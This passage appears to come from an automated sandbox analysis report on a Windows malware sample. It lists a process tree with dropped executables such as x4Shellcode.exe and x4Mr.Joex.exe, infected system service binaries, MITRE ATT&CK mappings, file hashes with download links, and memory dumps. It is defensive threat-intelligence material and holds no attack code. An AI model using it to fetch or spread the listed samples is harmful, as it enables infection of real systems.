    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 248 -NGENProcess 250 -Pipe 254 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2252
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 240 -NGENProcess 1ec -Pipe 238 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:276
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 240 -InterruptEvent 244 -NGENProcess 1e4 -Pipe 1d4 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1304
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 258 -NGENProcess 250 -Pipe 1d0 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2708
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 25c -NGENProcess 1ec -Pipe 24c -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2648
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 260 -NGENProcess 1e4 -Pipe 1dc -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2316
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 264 -NGENProcess 250 -Pipe 248 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:872
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 268 -NGENProcess 1ec -Pipe 240 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2344
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 26c -NGENProcess 1e4 -Pipe 244 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 270 -NGENProcess 250 -Pipe 258 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2232
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 1c0 -NGENProcess 1c4 -Pipe 1d0 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:2860
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1cc -InterruptEvent 238 -NGENProcess 240 -Pipe 244 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    PID:2560
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  2⤵
  - Executes dropped EXE
  PID:1776
- C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE" /auditservice
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2364
- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
  "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
  2⤵
  - Executes dropped EXE
  PID:2284
- C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
  "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2280

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1196
- C:\Users\Admin\AppData\Local\Temp\3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe
  "C:\Users\Admin\AppData\Local\Temp\3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3012
- - C:\Users\Admin\AppData\Local\Temp\x4svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\x4svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\x4host.exe
    "C:\Users\Admin\AppData\Local\Temp\x4host.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Users\Admin\AppData\Local\Temp\x4host.exe
      "C:\Users\Admin\AppData\Local\Temp\x4host.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2556
- - C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe
    "C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
    "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
706KB

MD5
7828dcc0643d0ffbfc14a09540bc3fe5

SHA1
c94b8271a268811a2133f9f687666d459587e24d

SHA256
0beee4b444472dbff61f4dd7b663e566cd7a107730c88aabd2df51d0335392c6

SHA512
eceacc68bde59d9762788665a1b21940f65aa8857b3f5e09ac0101ec218fbca6bda7546651900d857af58acf96a3029628bff030478dab78e901d49cceac200a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE

Filesize
30.1MB

MD5
ab67d4fbf08dece731a49e6ffa01bc0c

SHA1
3d8e436d2bfd58208830eb8de1db68f4f36e58aa

SHA256
838a2446966fdb45951f4ca7f796cf9b62cc16255e66572c26e48c94f79ddb5e

SHA512
3e75f5f6477f7521ffd88e0a0eb294a414d102b3cd3fc7cd668f12f8561d3dac655f6d356c35bf7c2f789c137fe4aa6c0c71438694d18d2871d24156b82a8d89

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
781KB

MD5
d0c6b5a355123568f10118e4048ea680

SHA1
5ca2355071aaa01e9ea68d6b07cebdc0a64f64e5

SHA256
d09219faab28dec0b964c038b4aebf0d53d2b8103e18da6662f486b292d8403d

SHA512
776f826b03c89e00e926666ac7895332addd28ce9bb2aaf21951fa5feca33393dc382b78d025ddc9effc05c43552dd17a7760a1d4f563c66b1b59d45e90be1bf

Download Submit
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

Filesize
2.1MB

MD5
f273cebcbaab143419b4ed68b99f2473

SHA1
205ed6084fff3653242ef203f2164dccc92f6b61

SHA256
379c6a36efafda8703a61011e7a5047109cc28be47a972dd5981a4170ec8bfc1

SHA512
d9ee47fb4729711cd3fdf41762268016731c285611f1da536fef1f7f456bc745595aa22adca0c6b2ee9166c70321ce3ca1aaaac831824578739dae9b4daff167

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26802\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26802\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26802\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
d12403ee11359259ba2b0706e5e5111c

SHA1
03cc7827a30fd1dee38665c0cc993b4b533ac138

SHA256
f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

SHA512
9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26802\python311.dll

Filesize
1.6MB

MD5
5792adeab1e4414e0129ce7a228eb8b8

SHA1
e9f022e687b6d88d20ee96d9509f82e916b9ee8c

SHA256
7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

SHA512
c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4Mr.Joex.exe

Filesize
76KB

MD5
d299566894dfe7f85acfbf1033a6425b

SHA1
85533e1a427294aa3f9ab39fdf6d3ef855c4a3e2

SHA256
e62a5239c4599571d58fc59c7456024b8abf78b280bfcf5369658759ba9608b5

SHA512
0dbb85499b71767eac55935c51bc7de7ff332e3839b890e1a0da042f832508a74e625ed4ea83366d641c32183569bf48a35679286a295b53babf74a14098d2bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

Filesize
731KB

MD5
851be4e85b0f111883680e87099483a3

SHA1
155e19ad0d2ec4bef3ba25512b6e8bc403350ec9

SHA256
ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197

SHA512
bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4host.exe

Filesize
7.7MB

MD5
6744567c01e1c68851a13edc74f087ed

SHA1
a42f029b72974c069586e97fedf4fa8de965dd70

SHA256
d9cd70c2f17911e2c8b32ce6f0571f1567f195dd95ccc83ba48d1c2c8b0a5167

SHA512
d121c54a1308ff1c80091749e9b2cb2b7d3a82e3a25445df30eafcd84de54d091137277c7fc5194f551d506906090c8ea4a98a4a4865cc4fa353478f7ac7d4e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4svchost.exe

Filesize
47KB

MD5
8d8cd049bb5e46b1d041aa05b01e06bb

SHA1
5e5ed5a43c8ae871bd4e938e663eb39445e5c356

SHA256
01ebbee8144ef0da43c1bf4fd290c66d4573c56a9bdef94d888a1b94acf4c3ef

SHA512
ed7ee4d7a82d147fc6d7d053e0499625d585cb39701db94bbcab70f731243282d7ee24116e324ac6e0bf9df870d2315663537c3a7ed2c8b5f24f1a52392c1a96

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

Filesize
603KB

MD5
cac4fc47fe71ba6e3bb96d60b33a59d0

SHA1
9ecd7334d05056300f667f239ac11d537e9f6578

SHA256
652dd0a401150746950452de1afbcbae2cb1dbe6fcc0ea4bb302c178c2bb5cf8

SHA512
5c37beafab202b1d64c889224e3771a37ce061dd8b0758c6e024941f44ea6e980a1cb17bb61567f7ce2e1a7041433929ce534540ae31515ff23132588600fc63

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

Filesize
678KB

MD5
49906a505aaa298d3d7ea4fc365cd959

SHA1
d94fa8d5c846017fa54782ef7461f85e327ede42

SHA256
4010643af68e9b98b72e9db7a6edb60df4536179f0c22e73005cad803254f410

SHA512
3d649b8d03f4e70c357c39aeb39a02236e25de614c226215e2f3386978e2db5ca2db12d7fd12408c83c1823d2b5b43526d219150b866c407117649b6556dc2bf

Download Submit
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

Filesize
625KB

MD5
10eb0586a8920daf40fa59bd0e26f3ce

SHA1
207ef1435017200b5f922db706fdf57dae6d152b

SHA256
dde3aa92b0b31a2fa83eb407b801d5680b0ab870b67ab74a25c35ce68ad50c06

SHA512
f24dc349e00219d9c59e63aa37289611c43afab63fafa9b96203445c609f42b61c28ef0ce709031a19581caac011eba3e64201ec429263872270054aaa73e48a

Download Submit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

Filesize
656KB

MD5
b6af1eed2dd8a4efdf5975b88148b5dd

SHA1
50b70b9e9f966fe5749f7c1aa48dc327026582d1

SHA256
989dc32953b04dcc9cfd72acc33621492a0bb021d5f98a3725196840ae7e7b56

SHA512
c954cde1ea58848d140262dd9a80ed32afdfdeb073b706a980a9e6a4b3a45551349d009085330a5b49430e20e24c1cbf2655583ac744ea5c87f2cdbdd88cc58e

Download Submit
C:\Windows\System32\alg.exe

Filesize
644KB

MD5
176caee08fcb6d1a06c210fba0669f15

SHA1
c42e85d69fe35fad3bafe9cfe6a23271114f6a00

SHA256
e9c82a1df92cb4314b453fdf99178d5beeadf312259bcf8f9c80d94efd9e4f24

SHA512
232ef658fcf0533d9bc4c5d089be7481b10409fd0ea04b0428ca2212d317ca1483fadae610a438a99f20978687b7d8738bd3de8f99f105b858f5aaba8688b823

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI26802\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI26802\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI26802\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
memory/276-603-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/276-594-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/436-142-0x0000000140000000-0x000000014009D000-memory.dmp

Filesize
628KB

Download
memory/436-134-0x0000000000200000-0x0000000000260000-memory.dmp

Filesize
384KB

Download
memory/436-128-0x0000000000200000-0x0000000000260000-memory.dmp

Filesize
384KB

Download
memory/852-715-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/872-684-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/1296-116-0x0000000000920000-0x0000000000980000-memory.dmp

Filesize
384KB

Download
memory/1296-122-0x0000000000920000-0x0000000000980000-memory.dmp

Filesize
384KB

Download
memory/1296-141-0x0000000100000000-0x00000001000A4000-memory.dmp

Filesize
656KB

Download
memory/1304-612-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/1304-616-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/1540-210-0x0000000000DB0000-0x0000000000DB8000-memory.dmp

Filesize
32KB

Download
memory/1540-209-0x000000001A0A0000-0x000000001A382000-memory.dmp

Filesize
2.9MB

Download
memory/1540-293-0x0000000001510000-0x000000000153A000-memory.dmp

Filesize
168KB

Download
memory/1744-90-0x000007FEF61A0000-0x000007FEF6B8C000-memory.dmp

Filesize
9.9MB

Download
memory/1744-539-0x000007FEF61A0000-0x000007FEF6B8C000-memory.dmp

Filesize
9.9MB

Download
memory/1744-7-0x0000000000380000-0x0000000000392000-memory.dmp

Filesize
72KB

Download
memory/1776-175-0x00000000001E0000-0x0000000000240000-memory.dmp

Filesize
384KB

Download
memory/1776-181-0x00000000001E0000-0x0000000000240000-memory.dmp

Filesize
384KB

Download
memory/1776-183-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/1776-611-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/1900-152-0x0000000000590000-0x00000000005F7000-memory.dmp

Filesize
412KB

Download
memory/1900-569-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/1900-147-0x0000000000590000-0x00000000005F7000-memory.dmp

Filesize
412KB

Download
memory/1900-146-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2100-579-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2100-558-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2232-730-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2232-723-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2252-578-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2252-583-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2280-220-0x000000002E000000-0x000000002E0B5000-memory.dmp

Filesize
724KB

Download
memory/2280-658-0x000000002E000000-0x000000002E0B5000-memory.dmp

Filesize
724KB

Download
memory/2284-202-0x0000000000FD0000-0x0000000001030000-memory.dmp

Filesize
384KB

Download
memory/2284-196-0x0000000000FD0000-0x0000000001030000-memory.dmp

Filesize
384KB

Download
memory/2284-208-0x0000000140000000-0x00000001400CA000-memory.dmp

Filesize
808KB

Download
memory/2284-204-0x0000000140000000-0x00000001400CA000-memory.dmp

Filesize
808KB

Download
memory/2316-673-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2344-692-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2344-700-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2364-628-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/2364-193-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/2364-186-0x0000000000AE0000-0x0000000000B47000-memory.dmp

Filesize
412KB

Download
memory/2364-191-0x0000000000AE0000-0x0000000000B47000-memory.dmp

Filesize
412KB

Download
memory/2556-140-0x000007FEF2BE0000-0x000007FEF31C9000-memory.dmp

Filesize
5.9MB

Download
memory/2560-540-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/2560-543-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/2648-657-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2648-648-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2664-85-0x0000000000EA0000-0x0000000000EBA000-memory.dmp

Filesize
104KB

Download
memory/2696-89-0x0000000000400000-0x00000000004B9000-memory.dmp

Filesize
740KB

Download
memory/2696-139-0x0000000000400000-0x00000000004B9000-memory.dmp

Filesize
740KB

Download
memory/2696-96-0x0000000000230000-0x0000000000297000-memory.dmp

Filesize
412KB

Download
memory/2696-91-0x0000000000230000-0x0000000000297000-memory.dmp

Filesize
412KB

Download
memory/2708-637-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2708-629-0x0000000000400000-0x00000000004A8000-memory.dmp

Filesize
672KB

Download
memory/2860-526-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/2860-518-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/3012-98-0x000007FEF61A0000-0x000007FEF6B8C000-memory.dmp

Filesize
9.9MB

Download
memory/3012-87-0x000007FEF61A0000-0x000007FEF6B8C000-memory.dmp

Filesize
9.9MB

Download
memory/3012-1-0x00000000010B0000-0x0000000001908000-memory.dmp

Filesize
8.3MB

Download
memory/3012-0-0x000007FEF61A3000-0x000007FEF61A4000-memory.dmp

Filesize
4KB

Download
memory/3052-167-0x0000000140000000-0x00000001400AE000-memory.dmp

Filesize
696KB

Download
memory/3052-159-0x0000000000AB0000-0x0000000000B10000-memory.dmp

Filesize
384KB

Download
memory/3052-165-0x0000000000AB0000-0x0000000000B10000-memory.dmp

Filesize
384KB

Download